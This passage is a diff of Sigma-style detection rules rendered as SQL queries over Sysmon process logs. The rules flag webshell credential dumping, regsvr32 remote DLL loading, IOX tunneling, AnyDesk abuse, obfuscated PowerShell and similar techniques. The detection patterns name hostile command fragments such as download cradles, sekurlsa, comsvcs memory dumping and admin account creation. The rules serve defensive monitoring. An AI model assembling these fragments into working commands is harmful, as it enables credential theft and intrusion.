when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.010" ], "falsepositives": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" + "FQDNs that start with a number" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_powershell_defender_exclusion.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", - "id": "55f0a3a1-846e-40eb-8273-677371b8d912", - "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "status": "experimental", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + 
"description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Sysprep on AppData Folder", - "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", - "status": "test", - "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "status": "experimental", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059.001", + 
"attack.g0069" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysprep_appdata.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "title": "Custom Class Execution via Xwizard", + "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP 
'\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" }, { - "title": "Service Security Descriptor Tampering Via Sc.EXE", - "id": "98c5aeef-32d5-492f-b174-64a691896d25", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", "status": "experimental", - "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE 
'%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_sdset_modification.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Suspicious Execution Of PDQDeployRunner", - "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", - "status": "experimental", - "description": "Detects suspicious execution of \"PDQDeployRunner\" 
which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "status": "test", + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the PDQDeploy tool to execute these commands" + "Legitimate deployment of AnyDesk" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE 
'%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Use of Adplus.exe", - "id": "2f869d59-7f6a-4931-992c-cce556ff2d53", + "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", + "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", "status": "experimental", - "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1003.001" - ], + "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", + "author": "Florian Roth (Nextron Systems), Hieu Tran", "falsepositives": [ - "Legitimate usage of Adplus" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE 
'\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_adplus.yml" + "filename": "proc_creation_win_powershell_download_dll.yml" }, { - "title": "Execution in Webserver Root Folder", - "id": "35efb964-e6a5-47ad-bbcd-19661854018d", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", "status": "test", - "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" ], "falsepositives": [ - "Various applications", - "Tools that include ping or nslookup command invocations" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_path_webserver.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "title": "Uninstall 
Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", "status": "test", - "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR 
CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Process Creation Using Sysnative Folder", - "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", - "status": "experimental", - "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Suspicious Extrac32 Alternate Data Stream Execution", + "id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "status": "test", + "description": "Extract data from cab file and hide it in an alternate data stream", + "author": "frack113", "tags": [ - "attack.t1055" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_susp_sysnative.yml" + "filename": "proc_creation_win_lolbin_extrac32_ads.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": 
"b7155193-8a81-4d8f-805d-88de864ca50c", - "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", - "author": "Florian Roth (Nextron Systems)", + "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", + "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "status": "experimental", + "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate piping of the password to anydesk", + "Some FP could occur with similar tools that uses the same command line '--set-password'" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE '%.exe --set-password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", - "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "title": 
"Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", + "status": "test", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1053.005" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Windows Binary Executed From WSL", - "id": "ed825c86-c009-4014-b413-b76003e33d35", + "title": "Add SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "status": "experimental", - "description": "Detects the execution of Windows binaries from within a WSL instance. 
This could be used to masquerade parent-child relationships", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1202" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs 